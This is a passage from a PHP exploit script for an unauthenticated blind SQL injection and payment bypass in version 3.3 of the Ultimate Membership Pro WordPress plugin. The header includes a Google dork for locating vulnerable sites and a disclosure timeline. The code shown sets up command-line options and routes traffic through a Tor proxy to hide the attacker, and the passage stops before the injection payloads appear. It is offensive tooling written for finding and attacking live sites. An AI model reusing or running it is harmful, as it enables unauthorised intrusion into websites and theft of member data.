WordPress Ultimate Membership Pro Plugin 3.3 – SQL Injection

<?php
/**
 * Exploit Title: Ultimate Membership Pro WordPress Plugin Exploit
 * Google Dorks: inurl:"lid=0" OR inurl:"lid=1" ...  inurl:"lid=100" "Register" "Confirm Password"
 * Exploit Author: wp0Day.com <contact@wp0day.com>
 * Vendor Homepage: http://wpindeed.com/
 * Software Link: http://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
 * Version: 3.3
 * Tested on: Debian 8, PHP 5.6.17-3
 * Type: Unauthenticated Blind SQLi, Unauthenticated Payment Bypass
 * Time line: Found [07-Jun-2016], Vendor notified [08-Jun-2016], Vendor fixed: [Yes], [RD:1466846149]
 */
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:l:e:s:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
    showHelp();
}
if ($options['tor'] === true)
{
    echo " ### USING TOR ###\n";
    echo "Setting TOR Proxy...\n";
    $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
    $curl->addOption(CURLOPT_PROXYTYPE,7);
    echo "Checking IPv4 Address\n";
    $curl->get('https://dynamicdns.park-your-domain.com/getip');
    echo "Got IP : ".$curl->getResponse()."\n";
    echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
    $answer = fgets(fopen ("php://stdin","r"));
    if(trim($answer) != 'wololo'){
        die("Aborting!\n");
    }